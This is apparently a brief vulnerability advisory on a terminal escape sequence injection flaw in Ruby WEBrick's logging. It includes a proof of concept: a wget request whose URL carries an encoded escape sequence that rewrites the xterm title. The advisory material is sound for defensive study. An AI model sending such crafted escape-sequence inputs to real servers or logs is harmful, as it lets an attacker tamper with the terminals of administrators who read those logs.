Ruby WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability

Ruby WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability

Attackers can exploit this issue with readily available tools.

The following example is available:

% xterm -e ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port=>8080).start' &
% wget http://www.example.com:8080/%1b%5d%32%3b%6f%77%6e%65%64%07%0a